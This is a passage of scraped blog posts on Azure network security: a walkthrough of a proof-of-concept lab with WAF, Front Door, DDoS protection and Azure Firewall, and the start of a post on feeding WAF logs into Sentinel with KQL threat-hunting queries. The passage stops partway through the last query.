style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226206i04EFE3B6361A1867/image-size/large?v=v2&amp;px=999" role="button" title="deploymentps.png" alt="deploymentps.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P>&nbsp;</P> <P>In view of the deployment type you use, the demo environment should include the following resources upon deployment:</P> <P>&nbsp;</P> <UL class="lia-list-style-type-circle"> <LI>3 Virtual Networks (1 Hub that hosts the firewall and 2 Spoke VNets)</LI> <LI>1 Application Gateway provisioned with Web Application Firewall</LI> <LI>1 Azure Front door with WAF enabled</LI> <LI>1 Azure Firewall (deployed in Hub VNet via Azure Firewall manager)</LI> <LI>3 VMs (2 Windows and 1 Kali Linux)</LI> <LI>2 Public IP addresses (1 for the Firewall and 1 for the App Gateway)</LI> <LI>DDoS protection enabled for the Hub virtual network</LI> <LI>2 NSGs</LI> <LI>Route table</LI> <LI>Web App (Demo web app to perform vulnerability tests)</LI> </UL> <P>&nbsp;</P> <P>The resources have been connected in a simple hub and spoke topology as seen in the diagram below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="demo_env.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226215i5DFED87487D7094D/image-size/large?v=v2&amp;px=999" role="button" title="demo_env.png" alt="demo_env.png" /></span></P> <P>&nbsp;</P> <P>The <EM>hub</EM> is a virtual network (VN-HUB) in Azure that acts as a central point of connectivity to your on-premises network. This is where you want to place the firewall. The <EM>spokes</EM> are virtual networks that peer with the hub and can be used to isolate workloads, thereby modeling a common deployment scenario for most network designs. 
This network diagram uses these two basic connections to keep it simple:&nbsp;</P> <P>&nbsp;</P> <UL> <LI>The hub virtual network will use virtual gateway access for the firewall to route traffic.</LI> <LI>The Spoke virtual networks will use the subnets to host the Azure resources (VMs etc.)</LI> </UL> <P>&nbsp;</P> <P><EM>Other additional considerations</EM></P> <UL> <LI><EM>(If the planned spoke is in a local area network that requires a VPN connection through an external public interface, use this link: <A href="#" target="_blank" rel="noopener">On-Premise-Network connection to Gateway</A>).</EM></LI> <LI><EM>If you require multiple spoke-to-spoke connections, you may soon run out of allowable virtual network peerings. User Defined Routes may then be used to create routes in the router to forward traffic. See more on <A href="#" target="_blank" rel="noopener">Multiple-Spokes-VNET-Connections.</A></EM></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Azure Network Security Components</H2> <P>&nbsp;</P> <H2><STRONG><FONT color="#333399">Web Application Firewall (WAF)</FONT></STRONG></H2> <P>Web Application Firewall protects web apps from vulnerabilities and attacks without modification to back-end code, helping to prevent application outage and data loss.</P> <P>&nbsp;</P> <H3><STRONG><FONT color="#333399">WAF policy</FONT></STRONG></H3> <P>WAF is configured through HTTP and HTTPS listeners by setting up a WAF security policy and applying it to Azure Front Door, Application Gateway or CDN. <BR /><BR /></P> <P>&nbsp;</P> <H3><FONT color="#333399"><STRONG>WAF: Azure Application Gateway</STRONG></FONT></H3> <P>WAF, when combined with Application Gateway, works as a web traffic load balancer and provides L3-L7 security for your back-end pool: VMs, VM scale sets, IP addresses and app service. 
For more information on the App gateway go to <A href="#" target="_blank" rel="noopener">AppGateway features</A>.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-240px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_0-1602573298320.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226211i948554E10608098D/image-size/large?v=v2&amp;px=999" role="button" title="tobio_0-1602573298320.png" alt="tobio_0-1602573298320.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>To view the WAF policy configured with the <STRONG>Application Gateway</STRONG> in the <EM>demo</EM> deployment:</P> <P>&nbsp;</P> <UL class="lia-list-style-type-circle"> <LI class="lia-indent-padding-left-30px">Go to the test Resource group that was created “<STRONG>demoresourcegroup” </STRONG>and click on<STRONG> SOC-NS-AGPolicy </STRONG>to view the WAF policy for the Application Gateway. The managed and custom rule sets can be used to effectively <A href="#" target="_blank" rel="noopener">allow/deny traffic</A> when in <STRONG>prevention</STRONG> mode.</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_0-1602575647184.png" style="width: 603px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226219iC7F82E366D78B2CA/image-dimensions/603x367?v=v2" width="603" height="367" role="button" title="tobio_0-1602575647184.png" alt="tobio_0-1602575647184.png" /></span></P> <P class="lia-indent-padding-left-90px">&nbsp;</P> <P><STRONG>Detection</STRONG> mode allows traffic to pass through while logging the attack events. Use this mode to observe and learn traffic behavior at the beginning for proper tuning, then switch to Prevention mode. 
This is the recommended configuration.</P> <P>&nbsp;</P> <P><EM>The <STRONG>request body size</STRONG> (KB) can also be edited here, and you can configure what parts of requests to exclude under the <STRONG>Exclusions </STRONG>area.</EM></P> <P><STRONG>&nbsp;</STRONG></P> <P><STRONG>Managed rule set:</STRONG> This is the OWASP top vulnerability attacks list. It uses the OWASP 3.1 or most recent core rule set.</P> <P>&nbsp;</P> <P><STRONG>Custom rule: </STRONG>To block an IP from Canada or a geolocation of choice:&nbsp; Click <EM>+Add custom rule.</EM></P> <P>&nbsp;</P> <UL> <LI>Custom rule name: type “blockCanada”.</LI> <LI>Status: <STRONG>Enabled</STRONG>, Rule type: <STRONG>Match</STRONG>, Priority: <STRONG>1</STRONG> or as desired</LI> <LI>IF <STRONG>Matchtype</STRONG>: dropdown- Geolocation</LI> <LI>Select Canada. You can select more than one.</LI> <LI>Then: <EM>Select Deny traffic</EM> (Or redirect to a custom page).</LI> <LI>Click Add</LI> </UL> <P>&nbsp;</P> <P>To view the Custom rules set up earlier in the WAF policy, click on Custom rules. 3 custom rules can be seen. 
<A href="#" target="_blank" rel="noopener">Other features</A> of Application Gateway when combined with WAF include protection from crawlers and scanners, bot mitigation, cross-site scripting etc.</P> <P>&nbsp;</P> <P>The OWASP <A href="#" target="_blank" rel="noopener">Juice shop website</A>, a site with vulnerabilities common to web apps, has been deployed in the App Gateway with WAF enabled for this scenario.</P> <P>&nbsp;</P> <UL> <LI>Go to the <STRONG><EM>demoresourcegroup</EM> </STRONG>and click on the Application Gateway configured with the demo deployment on the list: In our case: <STRONG><EM>SOC-NS-AG-WAFv2</EM>.</STRONG></LI> <LI>In the Overview section, on the right, the front-end private and public IP addresses associated with the Application Gateway are shown.</LI> <LI>Click on the <STRONG>Public IP</STRONG> to confirm the OWASP Juice web application is accessible.</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-150px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="AppGW.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226223i491D5B9E0DD450CC/image-size/large?v=v2&amp;px=999" role="button" title="AppGW.png" alt="AppGW.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><FONT color="#333399"><STRONG>WAF: Azure Front Door</STRONG></FONT></P> <P>Azure Front Door provides a secure global traffic delivery solution for your backend resources. 
It uses <EM>anycast</EM> protocol to improve global connectivity and availability using smart health probe, URL Path Based Routing, Multiple site hosting, Session Affinity, App Layer security, URL redirection.</P> <P>&nbsp;</P> <P>The <STRONG>URL/IP </STRONG>for your web application and a <STRONG>Web Application Firewall </STRONG>policy are required to configure WAF for your environment behind Azure Front door.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px">To view the <STRONG>Front door </STRONG>and <STRONG>WAF </STRONG>configured with this deployment, go to the test resource group <EM>demoresourcegroup<STRONG>,</STRONG></EM> and click the <EM>Front door</EM> in the list. In this case, <STRONG><EM>Demowasp-jfyg5g7ve5w6a</EM></STRONG></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px">On the <STRONG>Overview</STRONG> page, click on the Frontend host link on the right to view the web app. It should be a link with <EM>azurefd.net</EM> as part of the URL. E.g. <STRONG><EM><A href="#" target="_blank" rel="noopener">https://Demowasp-7tzl765vvi3qe.azurefd.net</A></EM></STRONG></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">Back on the same Front door page, click on <STRONG><EM>Front Door designer</EM></STRONG></P> <P class="lia-indent-padding-left-60px">a. The <STRONG><EM>front-end</EM></STRONG> domain configured can be seen. Click on the demo app.</P> <P class="lia-indent-padding-left-90px">- The session affinity and WAF features can be toggled as desired.</P> <P class="lia-indent-padding-left-90px">- The policy applied can also be changed if you have created other policies.</P> <P class="lia-indent-padding-left-120px">&nbsp;</P> <P class="lia-indent-padding-left-60px">b. Under the <STRONG><EM>Backend pools</EM></STRONG>, the OWASP app can be viewed.</P> <P class="lia-indent-padding-left-90px">This is your app or container. Click the <EM>app</EM> to edit configurations such as health probes and load balancing options. 
Multiple backend hosts can also be added. In this case, we have added a back-end pool using the public IP address for our OWASP Juice shop application.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">c. Lastly, <STRONG><EM>Routing rules</EM></STRONG>: This is the connection between the frontend/domains and the backend pool from a and b above.</P> <P class="lia-indent-padding-left-90px">If additional back-end pools are needed, you can add them here.&nbsp;<A href="#" target="_blank" rel="noopener">Path Based routes</A> can also be set up in this window for content distribution and management. If you need to permit Front door access to your Key Vault, <A href="#" target="_blank" rel="noopener">check certificate permission</A>.</P> <P class="lia-indent-padding-left-90px">&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-180px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_0-1602610549062.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226377i2FD4723C9FAD65E8/image-size/large?v=v2&amp;px=999" role="button" title="tobio_0-1602610549062.png" alt="tobio_0-1602610549062.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Under <STRONG>Settings, </STRONG>select <EM>Web Application Firewall</EM>. 
The WAF policy for this front door <EM>SOCNSFDPolicy</EM> has been linked.</P> <P>When Front door is combined with WAF in this way, rate limiting can be configured to manage access to your backend resources.</P> <P>&nbsp;</P> <P>Visit the Azure <A href="#" target="_blank" rel="noopener">documentation</A> to see examples of custom rules with PowerShell and to configure the rules with Azure <A href="#" target="_blank" rel="noopener">portal</A>.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT color="#333399"><STRONG>DDoS</STRONG></FONT></H2> <P>To view the DDOS protection standard deployed, go to <STRONG>demoresourcegroup </STRONG>and click on <STRONG>SOCNSDDOSPLAN </STRONG>(or the name given to your DDOS plan in your resource group). You can enable and disable the plan here. DDOS can only be enabled for a Virtual Network. You can configure one DDoS protection plan for your organization and link virtual networks from multiple subscriptions to the same plan. More information on the DDOS plan <A href="#" target="_blank" rel="noopener">here.</A></P> <P>&nbsp;</P> <P>The test is performed using the public facing IP address to the resource’s endpoint. Apps may be placed in the Backend pool of App Gateway or set up in VMSS- all placed in the protected VNets, as shown in the network diagram above.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ddossubnets.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226381iCB07A2A044B98A88/image-size/large?v=v2&amp;px=999" role="button" title="ddossubnets.png" alt="ddossubnets.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <UL> <LI>Go to the <STRONG><EM>demoresourcegroup</EM> </STRONG>and click the<STRONG> <EM>VN-HUB</EM></STRONG>. The VN Hub is the virtual network protected by the DDOS protection standard.&nbsp;</LI> <LI>Under Settings, Click <STRONG>DDoS protection. 
</STRONG>If<STRONG> enabled, </STRONG>the two subnets in the Hub Virtual network: <STRONG>SOC-NS-AG-WAFv2</STRONG> and <STRONG>SOC-NS-FW</STRONG> are protected by the DDOS protection plan.</LI> </UL> <P>&nbsp;</P> <P>Go to the <EM>Application Gateway</EM>. To view the <STRONG>Front-end Public IP, </STRONG>Go to the right-hand corner of the Overview page.</P> <P>&nbsp;</P> <P>Next, we confirm how to set up<STRONG>&nbsp;the alerts</STRONG> for the DDOS protection metrics.</P> <P>&nbsp;</P> <UL> <LI>Go to the top search bar on the page and type in Monitor, Select <STRONG>Monitor</STRONG>.</LI> <LI>Under <STRONG>Alerts</STRONG>, select <STRONG>Manage alert rules, </STRONG>select <STRONG>+New Alert rule. </STRONG>Under<STRONG> Scope, </STRONG>choose your subscription and its resource group, select a Public IP. In this case: <STRONG><EM>SOCNSAGPIP (</EM></STRONG><EM>the Application gateway public facing IP address)</EM></LI> <LI>For <STRONG>Condition</STRONG>, Click <EM>Select Condition</EM> to add a new signal. Select “<STRONG>Under DDoS attack or Not</STRONG>”. 
<STRONG>Aggregation</STRONG>: Max, <STRONG>Threshold </STRONG>1.</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="alertlogic.png" style="width: 737px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226383iF8145AD120B15D05/image-size/large?v=v2&amp;px=999" role="button" title="alertlogic.png" alt="alertlogic.png" /></span></P> <P class="lia-indent-padding-left-90px">&nbsp;</P> <UL> <LI><STRONG>Action </STRONG><A href="#" target="_blank" rel="noopener"><STRONG>Group</STRONG></A>: Enter a name and provide an email address or phone number for notification.</LI> <LI>Under <STRONG style="font-family: inherit;">Settings</STRONG><SPAN style="font-family: inherit;">, Go to Diagnostic settings, enable the public IP </SPAN><STRONG style="font-family: inherit;">SOCNSAGPIP</STRONG></LI> </UL> <P>&nbsp;</P> <P>Visit the web resources for additional information on DDOS <A href="#" target="_blank" rel="noopener">adaptive tuning</A> and <A href="#" target="_blank" rel="noopener">DDoS Protection telemetry, monitoring, and alerting</A> . We have now set up the test environment to observe DDOS protection metrics.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT color="#333399"><STRONG>Azure Firewall</STRONG></FONT></H2> <P>The “<EM>demoresourcegroup</EM><STRONG>” </STRONG>has a firewall policy managed via the Firewall manager in the secure hub VNet for the POC scenario.</P> <P>Azure Firewall Manager enables centralized management of your firewalls in your network. In this case, we have only one Firewall. 
<A href="#" target="_blank" rel="noopener">More on Azure Firewall Manager</A></P> <P>&nbsp;</P> <P>To access the firewall configuration in the test deployment:</P> <P>&nbsp;</P> <UL> <LI>Go to <STRONG><EM>demoresourcegroup</EM></STRONG>, Click on <EM>Firewall</EM> (In this example: <STRONG>SOC-NS-FW</STRONG>).</LI> <LI>Under Settings, Go to <EM>the Firewall Manager</EM><STRONG>. </STRONG>Click on <EM>the Azure Firewall Manager</EM>.&nbsp; Click “<STRONG>Azure Firewall Policies</STRONG>”.</LI> <LI>The firewall Policy properties can be seen. Click the policy (<EM>SOC-NS-Policy</EM>).</LI> <LI>Click on <STRONG>Rules </STRONG>under Settings to see the rules. There are 3 different rule types in the collection: <STRONG>Network</STRONG>, <STRONG>Application </STRONG>and <STRONG>DNAT </STRONG>rules. The VMs can be accessed through the NATted public IPs in the DNAT rules.</LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="azfw.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/226399i3D39FE683382F477/image-size/large?v=v2&amp;px=999" role="button" title="azfw.png" alt="azfw.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Azure Firewall design is explicit deny-by-default. You can configure the rules for your traffic. As seen in the image above, the Azure firewall in the demo has been configured with the following:</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <UL> <LI><EM>The 2 spoke VNETs do not have direct connectivity between their subnets. 
</EM></LI> <LI><EM>Application rules are set up to grant and manage access using FQDN of search engines: Bing and Google for your test.</EM></LI> <LI><EM>Network rules to permit only </EM><EM>SMB, RDP and SSH and deny all others have been configured.</EM></LI> <LI><EM style="font-family: inherit;">DNAT rules to permit access from unique NATted IPs for VM access via the firewall have been configured.</EM></LI> </UL> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P>You may insert additional rules for your POC and test for connectivity.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2><FONT color="#333399">Conclusion</FONT></H2> <P>&nbsp;</P> <P>Performing a Proof of concept may be done for several reasons: trying out a new network tool, introducing a new resource, capacity planning, performance, and response, trying out network architecture etc.</P> <P>&nbsp;</P> <P>When you have performed the Proof of concept, review the outcome with the reference model expectation in terms of established indices, success indices, security standards and timelines to work on newfound evidence.</P> <P>&nbsp;</P> <P>Also, confirm that you can monitor logs as discussed in the concluding session of part 1 of this series.</P> <P>&nbsp;</P> <P>Part 3 and beyond will focus on deep dive testing of these scenarios.</P> <P>&nbsp;</P> Fri, 16 Apr 2021 16:12:07 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168 tobiotolorin 2021-04-16T16:12:07Z Integrating Azure Web Application Firewall with Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306 <P>Written in collaboration with&nbsp;<LI-USER uid="89690"></LI-USER>&nbsp;and&nbsp;<LI-USER 
uid="293861"></LI-USER>&nbsp;</P> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P>Readers of this post will hopefully be familiar with both Azure Sentinel and Azure WAF. The idea we will be discussing is how to take the log data generated by WAF and do something useful with it in Sentinel, such as visualize patterns, detect potentially malicious activities, and respond to threats. If configured and tuned correctly (a topic for another post), Azure WAF will prevent attacks against your web applications. However, leaving WAF alone to do its job is not enough; security teams need to analyze the data to determine where improvements can be made and where extra action may be required on the part of response teams.</P> <P>&nbsp;</P> <H2>Send WAF Data to Sentinel</H2> <P>&nbsp;</P> <P>The first step to integrating these tools is to send WAF logs and other relevant data, such as access logs and metrics, to Sentinel. This process can be initiated using the built-in Sentinel Data Connector for Azure WAF:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_0-1601299630052.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222567iBE25448A004664F7/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_0-1601299630052.png" alt="Anthony_Roman_0-1601299630052.png" /></span></P> <P>&nbsp;</P> <P>Once you have connected your WAF data sources to Azure Sentinel, you can visualize and monitor the data using Workbooks, which provide versatility in creating custom dashboards. 
In the Azure Sentinel Workbooks tab, look up the default Azure WAF Workbook template to get you started with all WAF data types.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Picture1.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222575i266626DF2C259900/image-size/large?v=v2&amp;px=999" role="button" title="Picture1.gif" alt="Picture1.gif" /></span></P> <P>&nbsp;</P> <P>When starting out with the Microsoft WAF Workbook, you’ll be faced with a few data filter options:</P> <UL> <LI>Subscription (based on your portal <A href="#" target="_blank" rel="noopener">RBAC permissions</A>)</LI> <LI><A href="#" target="_blank" rel="noopener">Log Analytics workspaces</A></LI> <LI>Time Range</LI> <LI>WAF Data type (Example: <A href="#" target="_blank" rel="noopener">CDN</A>, <A href="#" target="_blank" rel="noopener">Application Gateway</A> or <A href="#" target="_blank" rel="noopener">Azure Front Door</A>)</LI> <LI>WAF Resources</LI> </UL> <P>In the short annotation below, you’ll be taken through a few preconfigured filters and two different subscriptions (across two different tenants), with two different workspaces preselected. The annotation walks through a SQL Injection attack that was detected and how you can filter down the information by time or by event data, such as an IP address or Tracking ID provided by the diagnostic logs.</P> <P>&nbsp;</P> <P>If you’re unfamiliar with a workbook, the design is a top to bottom filter experience. If you filter the top of the workbook, it’ll filter everything below with the selected filters above. You’ll see some filters that were not selected, for example “Blocked or Matched” within the logs, or the Blocked Request URI Addresses. 
Both could have been selected and filtered across the workbook.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="WAFWorkbook3.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/222599i820348A2D8A77305/image-size/large?v=v2&amp;px=999" role="button" title="WAFWorkbook3.gif" alt="WAFWorkbook3.gif" /></span></P> <P>&nbsp;</P> <H2>Hunting Using WAF Data</H2> <P>&nbsp;</P> <P>The core idea of Azure Sentinel is that security data relevant to your hunting or investigation is produced in multiple locations and logs, and being able to analyze it from a single point makes it easier to spot trends and see patterns that are out of the ordinary. The logs from our Azure WAF device are one critical part of this puzzle. As more and more companies move their applications to the cloud, their web application security posture has become highly relevant to their overall security framework. Through the WAF logs, we can analyze the application traffic and combine it with other data feeds to uncover various attack patterns that an organization needs to be aware of.</P> <P>&nbsp;</P> <P>However, to use the telemetry from WAF effectively, a general understanding of the WAF logs is critical.&nbsp; It is very hard to focus on the hunting mission and be productive and effective if we don’t understand the data.&nbsp; WAF data is collected in Azure Sentinel under the <EM><STRONG>AzureDiagnostics </STRONG></EM>table. 
Depending on whether the Azure WAF policy is applied to web applications hosted on Application Gateway or Azure Front Door, the category under which the logs are collected is a little different.</P> <P>&nbsp;</P> <P>While we don’t cover this thoroughly in this post, WAF Policies can be applied to CDN; <A href="#" target="_blank" rel="noopener">more information here.</A> When applied to CDN, the relevant logs are under the category:</P> <UL> <LI>WebApplicationFirewallLogs (set on the WAF Policy)</LI> <LI>AzureCdnAccessLog (set on the CDN Profile)</LI> </UL> <P>There are subtle differences between these log types (Application Gateway vs Front Door); in general, however, the access logs give us an idea of the application’s access patterns. The firewall logs, on the other hand, record any request that matches a WAF rule in either detection or prevention mode of the WAF policy. These logs include a bunch of interesting information like the caller's IP, port, requested URL, UserAgent and bytes in and out. The <A href="#" target="_blank" rel="noopener">Azure Sentinel GitHub repository</A> is a great source of inspiration for the kind of hunting and detection queries that one can build with some of these fields. However, let us go through a couple of examples of what we can do with this data.</P> <P>&nbsp;</P> <P>One of the techniques that a lot of threat hunters have in their arsenal is count-based hunting, i.e. they aggregate the event data and look for events that cross a particular threshold. For example, in the WAF data we could look for the number of sessions originating from a particular client IP address in a given interval of time. Once the number of connections exceeds a particular threshold value, an alert could be triggered for further investigation.</P> <P>However, since each environment is different, we will have to modify the threshold value accordingly. 
Additionally, IP-based session tracking has its own challenges and false positives due to dynamic factors such as proxies and NAT, which we have to be mindful of for these types of queries.</P> <P>&nbsp;</P>
<LI-CODE lang="sql">let Threshold = 200; //Adjust the threshold to a suitable value based on Environment, Time Period.
let AllData = AzureDiagnostics
| where TimeGenerated &gt;= ago(1d)
| where Category in ("FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog", "ApplicationGatewayFirewallLog", "ApplicationGatewayAccessLog")
| extend ClientIPAddress = iff(Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s);
// Client IPs with more distinct sessions than Threshold in the last day
let SuspiciousIP = AzureDiagnostics
| where TimeGenerated &gt;= ago(1d)
| where Category in ("ApplicationGatewayFirewallLog", "ApplicationGatewayAccessLog", "FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog")
| extend ClientIPAddress = iff(Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s)
| extend SessionTrackingID = iff(Category in ("FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog"), trackingReference_s, transactionId_g)
| distinct ClientIPAddress, SessionTrackingID
| summarize count() by ClientIPAddress
| where count_ &gt; Threshold
| distinct ClientIPAddress;
// Pull the request details for those IPs
SuspiciousIP
| join kind = inner (AllData) on ClientIPAddress
| extend SessionTrackingID = iff(Category in ("FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog"), trackingReference_s, transactionId_g)
| summarize makeset(requestUri_s), makeset(requestQuery_s), makeset(SessionTrackingID), makeset(clientPort_d), SessionCount = count() by ClientIPAddress, _ResourceId
| extend HostCustomEntity = _ResourceId, IPCustomEntity = ClientIPAddress</LI-CODE>
<P>&nbsp;</P> <P>Another way to leverage the WAF data could be 
through Indicators of Compromise (IoCs) matching. IoCs are data that associate observations such as URLs, file hashes or IP addresses with known threat activity such as phishing, botnets, or malware. Many organizations aggregate threat indicator feeds from a variety of sources, curate the data and then apply it to their available logs. They could match these IoCs with their WAF logs as well. For more details check out this <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/bring-your-threat-intelligence-to-azure-sentinel/ba-p/1167546" target="_blank" rel="noopener">great blog post</A> that talks about how you can import threat intelligence (TI) data into Azure Sentinel.&nbsp; Once the TI data is imported in Azure Sentinel you can view it in the ThreatIntelligenceIndicator table in Logs. Below is a quick example of how you can match the WAF data with the TI data to see if there is any traffic that is originating from a Bot Network or from an IP that is known to be bad.</P> <P>&nbsp;</P>
<LI-CODE lang="sql">let dt_lookBack = 1h;
let ioc_lookBack = 14d;
ThreatIntelligenceIndicator
| where TimeGenerated &gt;= ago(ioc_lookBack) and ExpirationDateTime &gt; now()
| where Active == true
// Picking up only IOC's that contain the entities we want
| where isnotempty(NetworkIP) or isnotempty(EmailSourceIpAddress) or isnotempty(NetworkDestinationIP) or isnotempty(NetworkSourceIP)
// As there is potentially more than 1 indicator type for matching IP, taking NetworkIP first, then others if that is empty.
// Taking the first non-empty value based on potential IOC match availability
| extend TI_ipEntity = iff(isnotempty(NetworkIP), NetworkIP, NetworkDestinationIP)
| extend TI_ipEntity = iff(isempty(TI_ipEntity) and isnotempty(NetworkSourceIP), NetworkSourceIP, TI_ipEntity)
| extend TI_ipEntity = iff(isempty(TI_ipEntity) and isnotempty(EmailSourceIpAddress), EmailSourceIpAddress, TI_ipEntity)
| join (
    AzureDiagnostics
    | where TimeGenerated &gt;= ago(dt_lookBack)
    | where Category in ('ApplicationGatewayFirewallLog', 'FrontdoorWebApplicationFirewallLog', 'ApplicationGatewayAccessLog', 'FrontdoorAccessLog')
    | where isnotempty(clientIP_s) or isnotempty(clientIp_s)
    | extend ClientIPAddress = iff(Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s)
    | extend WAF_TimeGenerated = TimeGenerated
) on $left.TI_ipEntity == $right.ClientIPAddress
| project TimeGenerated, ClientIPAddress, Description, ActivityGroupNames, IndicatorId, ThreatType, ExpirationDateTime, ConfidenceScore, _ResourceId, WAF_TimeGenerated, Category, ResourceGroup, SubscriptionId, ResourceType, OperationName, requestUri_s, ruleName_s, host_s, clientPort_d, details_data_s, details_matches_s, Message, ruleSetType_s, policyScope_s
| extend IPCustomEntity = ClientIPAddress, HostCustomEntity = _ResourceId, timestamp = WAF_TimeGenerated, URLCustomEntity = requestUri_s</LI-CODE>
<P>&nbsp;</P> <P>Threat hunters could even leverage KQL advanced modelling capabilities on WAF logs to find anomalies. For example, they could perform time series analysis on the WAF data. A time series is a series of data points indexed (or listed or graphed) in time order. By analyzing time series data over an extended period, we can identify time-based patterns (e.g. seasonality, trend etc.) in the data and extract meaningful statistics which can help in flagging outliers. 
The different thresholds would have to be adjusted depending on the environment.</P> <P>&nbsp;</P> <P>Below is an example query demonstrating Time Series IP anomaly.</P> <P>&nbsp;</P>
<LI-CODE lang="sql">let percentotalthreshold = 25;
let timeframe = 1h;
let starttime = 14d;
let endtime = 1d;
let scorethreshold = 5;
let baselinethreshold = 10;
// Per-IP request counts in 1h steps over the baseline window (14d ago to 1d ago)
let TimeSeriesData = AzureDiagnostics
  | where Category in ("ApplicationGatewayFirewallLog", "ApplicationGatewayAccessLog", "FrontdoorWebApplicationFirewallLog", "FrontdoorAccessLog") and action_s in ("Log", "Matched", "Detected")
  | where isnotempty(clientIP_s) or isnotempty(clientIp_s)
  | extend ClientIPAddress = iff(Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s)
  | where TimeGenerated between ((ago(starttime))..(ago(endtime)))
  | project TimeGenerated, ClientIPAddress
  | make-series Total=count() on TimeGenerated from (ago(starttime)) to (ago(endtime)) step timeframe by ClientIPAddress;
// Points in each series flagged as anomalous, with a baseline above baselinethreshold
let TimeSeriesAlerts=TimeSeriesData
  | extend (anomalies, score, baseline) = series_decompose_anomalies(Total, scorethreshold, 1, 'linefit')
  | mv-expand Total to typeof(double), TimeGenerated to typeof(datetime), anomalies to typeof(double), score to typeof(double), baseline to typeof(long)
  | where anomalies &gt; 0
  | extend score = round(score,2), AnomalyHour = TimeGenerated
  | project ClientIPAddress, AnomalyHour, TimeGenerated, Total, baseline, anomalies, score
  | where baseline &gt; baselinethreshold;
// Join the flagged IPs with their hourly activity from the last day
TimeSeriesAlerts
  | join (
      AzureDiagnostics
      | extend ClientIPAddress = iff(Category in ("FrontdoorWebApplicationFirewallLog", "ApplicationGatewayAccessLog"), clientIP_s, clientIp_s)
      | where isnotempty(ClientIPAddress)
      | where TimeGenerated &gt; ago(endtime)
      | summarize HourlyCount = count(), TimeGeneratedMax = arg_max(TimeGenerated, *), ClientIPlist = make_set(clientIP_s), Portlist = make_set(clientPort_d) by clientIP_s, TimeGeneratedHour= bin(TimeGenerated, 1h)
      | extend AnomalyHour = TimeGeneratedHour
  ) on ClientIPAddress
  | extend PercentTotal = round((HourlyCount / Total) * 100, 3)
  | where PercentTotal &gt; percentotalthreshold
